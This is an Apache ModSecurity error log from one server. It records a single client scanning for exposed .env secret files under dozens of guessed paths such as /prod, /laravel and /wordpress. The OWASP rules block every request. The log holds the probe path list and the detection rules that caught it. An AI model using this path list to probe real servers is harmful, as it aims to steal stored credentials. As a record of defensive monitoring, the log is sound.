[Mon May 11 17:33:39.174806 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/live/.env"] [unique_id "agH20zJnyuKVXoStDhbM8gAAAEs"]
[Mon May 11 17:33:39.175031 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20zJnyuKVXoStDhbM8gAAAEs"]
[Mon May 11 17:33:39.292460 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/prod/.env"] [unique_id "agH20zJnyuKVXoStDhbM8wAAAEs"]
[Mon May 11 17:33:39.292695 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/prod/.env"] [unique_id "agH20zJnyuKVXoStDhbM8wAAAEs"]
[Mon May 11 17:33:39.292925 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20zJnyuKVXoStDhbM8wAAAEs"]
[Mon May 11 17:33:39.408279 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/dev/.env"] [unique_id "agH20zJnyuKVXoStDhbM9AAAAEs"]
[Mon May 11 17:33:39.408500 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/dev/.env"] [unique_id "agH20zJnyuKVXoStDhbM9AAAAEs"]
[Mon May 11 17:33:39.408742 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20zJnyuKVXoStDhbM9AAAAEs"]
[Mon May 11 17:33:39.530810 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/staging/.env"] [unique_id "agH20zJnyuKVXoStDhbM9QAAAEs"]
[Mon May 11 17:33:39.531039 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/staging/.env"] [unique_id "agH20zJnyuKVXoStDhbM9QAAAEs"]
[Mon May 11 17:33:39.531291 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20zJnyuKVXoStDhbM9QAAAEs"]
[Mon May 11 17:33:39.647942 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /opt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/opt/.env"] [unique_id "agH20zJnyuKVXoStDhbM9gAAAEs"]
[Mon May 11 17:33:39.648180 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/opt/.env"] [unique_id "agH20zJnyuKVXoStDhbM9gAAAEs"]
[Mon May 11 17:33:39.648409 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20zJnyuKVXoStDhbM9gAAAEs"]
[Mon May 11 17:33:39.763901 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/laravel/.env"] [unique_id "agH20zJnyuKVXoStDhbM-AAAAEs"]
[Mon May 11 17:33:39.764124 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/laravel/.env"] [unique_id "agH20zJnyuKVXoStDhbM-AAAAEs"]
[Mon May 11 17:33:39.764360 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20zJnyuKVXoStDhbM-AAAAEs"]
[Mon May 11 17:33:39.878734 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /symfony/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/symfony/.env"] [unique_id "agH20zJnyuKVXoStDhbM-QAAAEs"]
[Mon May 11 17:33:39.878962 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/symfony/.env"] [unique_id "agH20zJnyuKVXoStDhbM-QAAAEs"]
[Mon May 11 17:33:39.879176 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20zJnyuKVXoStDhbM-QAAAEs"]
[Mon May 11 17:33:39.999101 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wordpress/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/wordpress/.env"] [unique_id "agH20zJnyuKVXoStDhbM-gAAAEs"]
[Mon May 11 17:33:39.999348 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/wordpress/.env"] [unique_id "agH20zJnyuKVXoStDhbM-gAAAEs"]
[Mon May 11 17:33:39.999564 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20zJnyuKVXoStDhbM-gAAAEs"]
[Mon May 11 17:33:40.113313 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/wp/.env"] [unique_id "agH21DJnyuKVXoStDhbM-wAAAEs"]
[Mon May 11 17:33:40.113539 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/wp/.env"] [unique_id "agH21DJnyuKVXoStDhbM-wAAAEs"]
[Mon May 11 17:33:40.113748 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21DJnyuKVXoStDhbM-wAAAEs"]
[Mon May 11 17:33:40.228415 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cms/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/cms/.env"] [unique_id "agH21DJnyuKVXoStDhbM_AAAAEs"]
[Mon May 11 17:33:40.228636 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/cms/.env"] [unique_id "agH21DJnyuKVXoStDhbM_AAAAEs"]
[Mon May 11 17:33:40.228863 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21DJnyuKVXoStDhbM_AAAAEs"]
[Mon May 11 17:33:40.343202 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /drupal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/drupal/.env"] [unique_id "agH21DJnyuKVXoStDhbM_QAAAEs"]
[Mon May 11 17:33:40.343472 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/drupal/.env"] [unique_id "agH21DJnyuKVXoStDhbM_QAAAEs"]
[Mon May 11 17:33:40.343703 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21DJnyuKVXoStDhbM_QAAAEs"]
[Mon May 11 17:33:40.458779 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /joomla/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/joomla/.env"] [unique_id "agH21DJnyuKVXoStDhbM_gAAAEs"]
[Mon May 11 17:33:40.459002 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/joomla/.env"] [unique_id "agH21DJnyuKVXoStDhbM_gAAAEs"]
[Mon May 11 17:33:40.459258 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21DJnyuKVXoStDhbM_gAAAEs"]
[Mon May 11 17:33:40.573814 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /magento/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/magento/.env"] [unique_id "agH21DJnyuKVXoStDhbM_wAAAEs"]
[Mon May 11 17:33:40.574047 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/magento/.env"] [unique_id "agH21DJnyuKVXoStDhbM_wAAAEs"]
[Mon May 11 17:33:40.574307 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21DJnyuKVXoStDhbM_wAAAEs"]
[Mon May 11 17:33:40.688165 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shopify/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/shopify/.env"] [unique_id "agH21DJnyuKVXoStDhbNAAAAAEs"]
[Mon May 11 17:33:40.688391 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/shopify/.env"] [unique_id "agH21DJnyuKVXoStDhbNAAAAAEs"]
[Mon May 11 17:33:40.688622 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21DJnyuKVXoStDhbNAAAAAEs"]
